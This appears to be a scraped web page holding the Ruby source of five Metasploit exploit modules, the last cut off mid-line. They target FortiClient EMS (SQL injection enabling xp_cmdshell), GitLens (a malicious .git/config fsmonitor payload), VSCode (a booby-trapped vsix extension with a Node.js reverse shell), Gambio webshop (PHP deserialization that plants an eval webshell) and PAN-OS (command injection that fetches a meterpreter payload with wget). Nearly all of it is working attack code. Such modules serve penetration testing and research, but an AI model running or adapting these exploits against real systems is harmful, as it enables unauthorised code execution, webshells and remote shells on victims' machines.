<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::Tcp<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE',<br /> 'Description' => %q{<br /> An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).<br /> FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized<br /> platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which<br /> can be sent directly into database queries.<br /><br /> FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013<br /> and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.<br /> In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable<br /> SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code<br /> execution in the context of NT AUTHORITY\SYSTEM<br /><br /> Affected versions of FortiClient EMS include:<br /> 7.2.0 through 7.2.2<br /> 7.0.1 through 7.0.10<br /><br /> Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.<br /><br /> It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient<br /> EMS for the necessary vulnerable services to be available.<br /> },<br /> 'Author' => [<br /> 'Zach Hanley', # Analysis & PoC<br /> 'James Horseman', # Analysis & PoC<br /> 'jheysel-r7', # Msf module<br /> 'Spencer McIntyre' # Msf module assistance<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/'],<br /> [ 'URL', 'https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py'],<br /> [ 'CVE', '2023-48788']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Privileged' => true,<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2024-04-21',<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 8013<br /> },<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /> end<br /><br /> def get_register_info<br /> register_info = <<~REGISTER_INFO<br /> AVSIG_VER=1.00000<br /> REG_KEY=_<br /> EP_ONNETCHKSUM=0<br /> AVENG_VER=6.00266<br /> DHCP_SERVER=None<br /> FCTOS=WIN64<br /> VULSIG_VER=1.00000<br /> FCTVER=7.0.7.0345<br /> APPSIG_VER=13.00364<br /> USER=Administrator<br /> APPENG_VER=4.00082<br /> AVALSIG_VER=0.00000<br /> VULENG_VER=2.00032<br /> OSVER=Microsoft Windows Server 2019 , 64-bit (build 17763)<br /> COM_MODEL=VMware Virtual Platform<br /> RSENG_VER=1.00020<br /> AV_PROTECTED=0<br /> AVALENG_VER=0.00000<br /> PEER_IP=<br /> ENABLED_FEATURE_BITMAP=49<br /> EP_OFFNETCHKSUM=0<br /> INSTALLED_FEATURE_BITMAP=158583<br /> EP_CHKSUM=0<br /> HIDDEN_FEATURE_BITMAP=155943<br /> DISKENC=<br /> HOSTNAME=CYBER-RETQB1FLP<br /> AV_PRODUCT=<br /> FCT_SN=FCT8001638848651<br /> INSTALLUID=#{Faker::Internet.uuid.upcase}<br /> NWIFS=Ethernet0|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|1|*|0<br /> UTC=1710271774<br /> PC_DOMAIN=<br /> COM_MAN=VMware, Inc.<br /> CPU=Intel(R) Xeon(R) Silver 4215 CPU @ 2.50GHz<br /> MEM=12287<br /> HDD=99<br /> COM_SN=VMware-42 04 ed 2d 64 e8 0b 14-45 e9 e4 f6 5a c7 67 82<br /> DOMAIN=<br /> WORKGROUP=WORKGROUP<br /> USER_SID=S-1-5-21-#{rand(9) * 10}-#{rand(9) * 10}-#{rand(9) * 10}-500<br /> GROUP_TAG=<br /> ADGUID=<br /> EP_FGTCHKSUM=0<br /> EP_RULECHKSUM=0<br /> WF_FILESCHKSUM=0<br /> EP_APPCTRLCHKSUM=0<br /> REGISTER_INFO<br /> Rex::Text.encode_base64(register_info)<br /> end<br /><br /> def get_message(sqli)<br /> message = "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD{SQLI_PLACEHOLDER}\n"<br /> message << "IP=127.0.0.1\n"<br /> message << "MAC=#{Faker::Internet.mac_address}\n"<br /> message << "FCT_ONNET=0\n"<br /> message << "CAPS=32767\n"<br /> message << "VDOM=default\n"<br /> message << "EC_QUARANTINED=0\n"<br /> message << "SIZE= {SIZE_PLACEHOLDER}\n"<br /> message << "\n"<br /> message << "X-FCCK-REGISTER: SYSINFO||#{get_register_info}\n"<br /> message << 'X-FCCK-REGISTER-END'<br /> message << "\r\n"<br /> message << "\r\n"<br /> message.gsub!('{SQLI_PLACEHOLDER}', sqli)<br /> message_length = message.length<br /> message_length = message_length - '{SIZE_PLACEHOLDER}'.length + message_length.to_s.length<br /> message.gsub!('{SIZE_PLACEHOLDER}', message_length.to_s)<br /> message<br /> end<br /><br /> def send_message(sqli)<br /> message = get_message(sqli)<br /> vprint_status("Sending the following message: #{message}")<br /><br /> buf = ''<br /> begin<br /> connect(true, { 'SSL' => true })<br /> sock.put(message)<br /> buf = sock.get_once || ''<br /> rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e<br /> elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")<br /> ensure<br /> disconnect<br /> end<br /> vprint_status("The response received was: #{buf}")<br /> buf<br /> end<br /><br /> def check<br /> res = send_message("' OR 1=1; --")<br /> return CheckCode::Vulnerable('The SQLi has been exploited successfully') if res.include?('KA_INTERVAL')<br /> return CheckCode::Safe if res.include?("The FCT record doesn't exist")<br /><br /> CheckCode::Unknown("#{peer} - FmcDaemon.exe does not appear to be running on the endpoint targeted")<br /> end<br /><br /> def exploit<br /> # Things to note:<br /> # 1. xp_cmdshell is disabled by default so first we must enable it.<br /> # 2. The application takes the SQL statement we inject into and converts it all to upper case. This was causing<br /> # attempted Base64 encoded payloads to fail, and is why we send the payload has a hex string and decode it using SQL<br /> # before running the command with xp_command shell.<br /> # 3. We expect to see KA_INTERVAL in the response to every SQLi attempt except for when we deliver the payload which<br /> # is when we expect the response to be empty.<br /> inject = [<br /> "' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;--",<br /> "' OR 1=1; reconfigure;--",<br /> "' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;--",<br /> "' OR 1=1; reconfigure;--",<br /> "' OR 1=1; DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec master.dbo.xp_cmdshell @sql;--",<br /> ]<br /> inject.each do |sqli|<br /> if sqli == inject.last<br /> send_message(sqli).empty? ? print_good("The SQLi: #{sqli} was executed successfully") : fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.')<br /> else<br /> send_message(sqli).include?('KA_INTERVAL') ? print_good("The SQLi: #{sqli} was executed successfully") : fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.')<br /> end<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'GitLens Git Local Configuration Exec',<br /> 'Description' => %q{<br /> GitKraken GitLens before v.14.0.0 allows an untrusted workspace to execute git<br /> commands. A repo may include its own .git folder including a malicious config file to<br /> execute arbitrary code.<br /><br /> Tested against VSCode 1.87.2 with GitLens 13.6.0 on Ubuntu 22.04 and Windows 10<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # Metasploit module<br /> 'Paul Gerste', # Original advisory and PoC<br /> ],<br /> 'References' => [<br /> ['URL', 'https://www.sonarsource.com/blog/vscode-security-markdown-vulnerabilities-in-extensions/'],<br /> ['URL', 'https://www.sonarsource.com/blog/securing-developer-tools-git-integrations/'], # git hook<br /> ['URL', 'https://github.com/gitkraken/vscode-gitlens/commit/ee2a0c42a92d33059a39fd15fbbd5dd3d5ab6440'], # patch<br /> ['CVE', '2023-46944']<br /> ],<br /> 'DefaultOptions' => {<br /> 'EXITFUNC' => 'thread',<br /> 'DisablePayloadHandler' => false,<br /> 'FILENAME' => 'repo.zip',<br /> 'WfsDelay' => 3_600 # 1hr<br /> },<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [<br /> 'Linux/Unix (In-Memory)',<br /> {<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'Type' => :unix_cmd<br /> },<br /> ],<br /> # There may be a size limit, but using fetch payloads works great<br /> [<br /> 'PowerShell (In-Memory)',<br /> {<br /> 'Platform' => 'win',<br /> 'Payload' => {<br /> 'BadChars' => '"&'<br /> }<br /> }<br /> ],<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # windows fetch payloads pops up a CMD window for a second, then goes away<br /> },<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2023-11-14'<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('README', [true, 'The contents of the readme markdown file', '# Test'])<br /> ])<br /> end<br /><br /> def readme<br /> datastore['README'].to_s<br /> end<br /><br /> def git_head<br /> 'ref: refs/heads/master'<br /> end<br /><br /> def git_config<br /> %([core]<br /> repositoryformatversion = 0<br /> filemode = true<br /> bare = false<br /> logallrefupdates = true<br /> fsmonitor = "#{payload.encoded} #") # without the trailing # windows tacks on <space><int, 0><space><a long number>. so this avoids corrupting the payload<br /> end<br /><br /> def exploit<br /> # Create malicious zip archive containing our git repo<br /> files =<br /> [<br /> { data: readme, fname: 'README.md' },<br /> { data: git_config, fname: '.git/config' },<br /> { data: git_head, fname: '.git/HEAD' },<br /> { data: '', fname: '.git/objects/info/' },<br /> { data: '', fname: '.git/objects/pack/' },<br /> { data: '', fname: '.git/refs/heads/' },<br /> { data: '', fname: '.git/refs/tags/' },<br /> ]<br /><br /> zip = Msf::Util::EXE.to_zip(files)<br /><br /> file_create(zip)<br /> print_status('Waiting for shell')<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Visual Studio vsix Extension Exec',<br /> 'Description' => %q{<br /> Creates a vsix file which can be installed in Visual Studio Code as an extension.<br /> At activation/install, the extension will execute a shell or two.<br /><br /> Tested against VSCode 1.87.2 on Ubuntu 22.04<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # Metasploit module<br /> ],<br /> 'DefaultOptions' => {<br /> 'EXITFUNC' => 'thread',<br /> 'DisablePayloadHandler' => false,<br /> 'FILENAME' => 'extension.vsix',<br /> 'WfsDelay' => 3_600, # 1hr<br /> 'payload' => 'nodejs/shell_reverse_tcp' # cross platform<br /> },<br /> 'Platform' => 'nodejs',<br /> 'Arch' => ARCH_NODEJS,<br /> 'Targets' => [<br /> ['Automatic', {}],<br /> ],<br /> 'References' => [<br /> ['URL', 'https://medium.com/@VakninHai/the-hidden-risks-of-visual-studio-extensions-a-new-avenue-for-persistence-attacks-e56722c048f1'], # similar idea<br /> ['URL', 'https://code.visualstudio.com/api/get-started/your-first-extension'],<br /> ['URL', 'https://code.visualstudio.com/api/references/activation-events'] # onStartup Action<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> },<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2024-03-22' # date of development<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('NAME', [true, 'The name of the extension', 'Code Reviewer']),<br /> OptString.new('DESCRIPTION', [true, 'The description of the extension', 'Reviews code']),<br /> OptString.new('VERSION', [true, 'The version of the extension', '0.0.1']),<br /> OptString.new('README', [false, 'The readme contents for the extension', '']),<br /> ])<br /> end<br /><br /> def name<br /> datastore['NAME']<br /> end<br /><br /> def description<br /> datastore['DESCRIPTION']<br /> end<br /><br /> def version<br /> datastore['VERSION']<br /> end<br /><br /> def readme<br /> datastore['README']<br /> end<br /><br /> def manifest<br /> %(<?xml version="1.0" encoding="utf-8"?><br /><PackageManifest Version="2.0.0" xmlns="http://schemas.microsoft.com/developer/vsx-schema/2011" xmlns:d="http://schemas.microsoft.com/developer/vsx-schema-design/2011"><br /> <Metadata><br /> <Identity Language="en-US" Id="extension-name-fillmein" Version="#{version}" Publisher="#{Rex::Text.rand_text_alpha(10)}" /><br /> <DisplayName>#{name}</DisplayName><br /> <Description xml:space="preserve">#{description}</Description><br /> <Tags></Tags><br /> <GalleryFlags>Public</GalleryFlags><br /><br /> <Properties><br /> <Property Id="Microsoft.VisualStudio.Code.Engine" Value="^1.60.0" /><br /> <Property Id="Microsoft.VisualStudio.Code.ExtensionDependencies" Value="" /><br /> <Property Id="Microsoft.VisualStudio.Code.ExtensionPack" Value="" /><br /> <Property Id="Microsoft.VisualStudio.Code.ExtensionKind" Value="workspace" /><br /> <Property Id="Microsoft.VisualStudio.Code.LocalizedLanguages" Value="" /><br /> <Property Id="Microsoft.VisualStudio.Services.GitHubFlavoredMarkdown" Value="true" /><br /> <Property Id="Microsoft.VisualStudio.Services.Content.Pricing" Value="Free"/><br /> </Properties><br /> </Metadata><br /> <Installation><br /> <InstallationTarget Id="Microsoft.VisualStudio.Code"/><br /> </Installation><br /> <Dependencies/><br /> <Assets><br /> <Asset Type="Microsoft.VisualStudio.Code.Manifest" Path="extension/package.json" Addressable="true" /><br /> </Assets><br /></PackageManifest>)<br /> end<br /><br /> def extension_js<br /> %|const vscode = require('vscode');<br /><br />function activate(context) {<br /> #{payload.encoded}<br />}<br /><br />function deactivate() {}<br /><br />module.exports = {<br /> activate,<br /> deactivate<br />}<br />|<br /> end<br /><br /> def package_json<br /> %({<br /> "name": "#{name.gsub(' ', '.')}",<br /> "displayName": "#{name}",<br /> "description": "#{description}",<br /> "version": "#{version}",<br /> "publisher":"#{Rex::Text.rand_name}",<br /> "engines": {<br /> "vscode": "^1.60.0"<br /> },<br /> "activationEvents": ["onStartupFinished"],<br /> "main": "./extension.js",<br /> "devDependencies": {<br /> "@types/vscode": "^1.60.0"<br /> }<br />}<br />)<br /> end<br /><br /> def exploit<br /> # Create malicious vsix (zip archive) containing our exploit<br /> files =<br /> [<br /> { data: manifest, fname: 'extension.vsixmanifest' },<br /> { data: extension_js, fname: 'extension/extension.js' },<br /> { data: package_json, fname: 'extension/package.json' },<br /> { data: readme, fname: 'extension/README.md' }, # not required, but looks a little more official<br /> ]<br /><br /> zip = Msf::Util::EXE.to_zip(files)<br /><br /> file_create(zip)<br /> print_status('Waiting for shell')<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability',<br /> 'Description' => %q{<br /> A Remote Code Execution vulnerability in Gambio online webshop version 4.9.2.0 and lower<br /> allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.<br /> The identified vulnerability within Gambio pertains to an insecure deserialization flaw,<br /> which ultimately allows an attacker to execute remote code on affected systems.<br /> The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.<br /> As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,<br /> potentially resulting in complete system compromise, data exfiltration, or unauthorized access<br /> to sensitive information.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor<br /> 'usd Herolab' # Discovery of the vulnerability<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-23759'],<br /> ['URL', 'https://attackerkb.com/topics/cxCsICfcDY/cve-2024-23759'],<br /> ['URL', 'https://herolab.usd.de/en/security-advisories/usd-2023-0046/']<br /> ],<br /> 'DisclosureDate' => '2024-01-19',<br /> 'Platform' => ['php', 'unix', 'linux'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 'Platform' => ['php'],<br /> 'Arch' => ARCH_PHP,<br /> 'Type' => :php<br /> }<br /> ],<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_X64, ARCH_X86],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],<br /> 'Linemax' => 16384<br /> }<br /> ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'The Gambia Webshop endpoint URL', '/' ]),<br /> OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),<br /> OptEnum.new('COMMAND',<br /> [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])<br /> ])<br /> end<br /><br /> def execute_php(cmd, _opts = {})<br /> payload = Base64.strict_encode64(cmd)<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, @webshell_name),<br /> 'vars_post' => {<br /> @post_param => payload<br /> }<br /> })<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> payload = Base64.strict_encode64(cmd)<br /> php_cmd_function = datastore['COMMAND']<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, @webshell_name),<br /> 'vars_get' => {<br /> @get_param => php_cmd_function<br /> },<br /> 'vars_post' => {<br /> @post_param => payload<br /> }<br /> })<br /> end<br /><br /> def upload_webshell<br /> # randomize file name if option WEBSHELL is not set<br /> @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")<br /><br /> # randomize e-mail address, firstname and lastname to be used in payload and POST requests<br /> email = Rex::Text.rand_mail_address<br /> email_array = email.split('@')<br /> domain = email_array[1]<br /> firstname = email_array[0].split('.')[0]<br /> lastname = email_array[0].split('.')[1]<br /> hostname = Rex::Text.rand_hostname<br /><br /> # Upload webshell with PHP payload<br /> @post_param = Rex::Text.rand_text_alphanumeric(1..8)<br /> @get_param = Rex::Text.rand_text_alphanumeric(1..8)<br /><br /> if target['Type'] == :php<br /> php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"<br /> else<br /> php_payload = "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"<br /> end<br /><br /> php_payload_len = php_payload.length<br /> webshell_name_len = @webshell_name.length<br /> domain_len = domain.length<br /> hostname_len = hostname.length<br /> final_payload = "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":4:{s:36:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\x00GuzzleHttp\\Cookie\\SetCookie\x00data\";a:9:{s:7:\"Expires\";i:1;s:7:\"Discard\";b:0;s:5:\"Value\";s:#{php_payload_len}:\"#{php_payload}\";s:4:\"Path\";s:1:\"/\";s:4:\"Name\";s:#{hostname_len}:\"#{hostname}\";s:6:\"Domain\";s:#{domain_len}:\"#{domain}\";s:6:\"Secure\";b:0;s:8:\"Httponly\";b:0;s:7:\"Max-Age\";i:3;}}}s:39:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00strictMode\";N;s:41:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00filename\";s:#{webshell_name_len}:\"#{@webshell_name}\";s:52:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00storeSessionCookies\";b:1;}"<br /> final_payload_b64 = Base64.strict_encode64(final_payload)<br /><br /> # create guest user to get a valid session cookie<br /> # country variable should match with a configured tax country in the gambio admin panel<br /> # grab the available tax country code settings from the CreateGuest form page<br /> res = send_request_cgi!({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'shop.php?do=CreateGuest')<br /> })<br /> if res && res.code == 200<br /> html = res.get_html_document<br /> unless html.blank?<br /> country_tax_options = html.css('select[@id="country"]')<br /> country_tax_options.css('option').each do |country|<br /> vprint_status("Application's tax country code setting required for exploitation: #{country['value']}")<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'shop.php?do=CreateGuest/Proceed'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'firstname' => firstname,<br /> 'lastname' => lastname,<br /> 'email_address' => email,<br /> 'email_address_confirm' => email,<br /> 'b2b_status' => 0,<br /> 'company' => nil,<br /> 'vat' => nil,<br /> 'street_address' => Rex::Text.rand_text_alpha_lower(8..12),<br /> 'postcode' => Rex::Text.rand_text_numeric(5),<br /> 'city' => Rex::Text.rand_text_alpha_lower(4..12),<br /> 'country' => country['value'],<br /> 'telephone' => Rex::Text.rand_text_numeric(10),<br /> 'fax' => nil,<br /> 'action' => 'process'<br /> }<br /> })<br /> next unless res && res.code == 302<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'shop.php?do=Parcelshopfinder/AddAddressBookEntry'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'checkout_started' => 0,<br /> 'search' => final_payload_b64,<br /> 'street_address' => Rex::Text.rand_text_alpha_lower(4..12),<br /> 'house_number' => Rex::Text.rand_text_numeric(1..2),<br /> 'additional_info' => nil,<br /> 'postcode' => Rex::Text.rand_text_numeric(5),<br /> 'city' => Rex::Text.rand_text_alpha_lower(8..12),<br /> 'country' => 'DE',<br /> 'firstname' => firstname,<br /> 'lastname' => lastname,<br /> 'postnumber' => Rex::Text.rand_text_numeric(6),<br /> 'psf_name' => Rex::Text.rand_text_alpha_lower(1..3)<br /> }<br /> })<br /> break<br /> end<br /> end<br /> end<br /> res<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited.")<br /> res = send_request_cgi!({<br /> 'method' => 'GET',<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'uri' => normalize_uri(target_uri.path)<br /> })<br /> return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200<br /><br /> # Check if target is running a Gambio webshop<br /> # Search for "Gambio" on the login page<br /> return CheckCode::Safe unless res.body.include?('gambio')<br /><br /> CheckCode::Detected('It looks like Gambio Webshop is running.')<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> res = upload_webshell<br /> fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 500<br /> register_file_for_cleanup(@webshell_name)<br /><br /> case target['Type']<br /> when :php<br /> execute_php(payload.encoded)<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> # Don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_cmdstager({ linemax: target.opts['Linemax'] })<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that<br /> allow an unauthenticated attacker to create arbitrarily named files and execute<br /> shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or<br /> GlobalProtect Portal enabled and telemetry collection on (default). Affected versions<br /> include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,<br /> < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to<br /> one hour to execute, depending on how often the telemetry service is set to run.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'remmons-r7', # Metasploit module<br /> 'sfewer-r7' # Metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-3400'], # At the time of announcement, both vulnerabilities were assigned one CVE identifier<br /> ['URL', 'https://security.paloaltonetworks.com/CVE-2024-3400'], # Vendor Advisory<br /> ['URL', 'https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/'], # Initial Volexity report of the 0day exploitation<br /> ['URL', 'https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis'] # Rapid7 Analysis<br /> ],<br /> 'DisclosureDate' => '2024-04-12',<br /> 'Platform' => [ 'linux', 'unix' ],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => true, # Executes as root on Linux<br /> 'Targets' => [ [ 'Default', {} ] ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',<br /> 'FETCH_COMMAND' => 'WGET',<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'FETCH_WRITABLE_DIR' => '/var/tmp',<br /> 'WfsDelay' => 3600 # 1h, since telemetry service cronjob can take up to an hour<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS,<br /> # The /var/log/pan/gpsvc.log file will log an unmarshal failure message for every malformed session created<br /> # The NGINX frontend web server, which proxies requests to the GlobalProtect service, will log client IPs in /var/log/nginx/sslvpn_access.log<br /> # Similarly, the log file /var/log/pan/sslvpn-access/sslvpn-access.log will also contain a log of the HTTP requests<br /> # The "device_telemetry_*.log" files in /var/log/pan will log the command being injected<br /> ARTIFACTS_ON_DISK<br /> # Several 0 length files are created in the following directories during checks and exploitation:<br /> # - /opt/panlogs/tmp/device_telemetry/hour/<br /> # - /opt/panlogs/tmp/device_telemetry/minute/<br /> # - /var/appweb/sslvpndocs/global-protect/portal/fonts/<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'An existing web application endpoint', '/global-protect/login.esp']),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # Try to create a new empty file in an accessible directory with the exploit primitive<br /> # This file name was chosen because an extension in (css|js|eot|woff|woff2|ttf) is required for correct NGINX routing, and similarly named files already exist in the 'fonts' directory<br /> file_check_name = "glyphicons-#{Rex::Text.rand_text_alpha_lower(8)}-regular.woff2"<br /> touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}")<br /><br /> # Access that file and a file that doesn't exist to confirm they return 403 and 404, respectively<br /> res_check_created = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri('global-protect', 'portal', 'fonts', file_check_name)<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res_check_created<br /><br /> res_check_not_created = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri('global-protect', 'portal', 'fonts', "X#{file_check_name}")<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res_check_not_created<br /><br /> if (res_check_created.code != 403) || 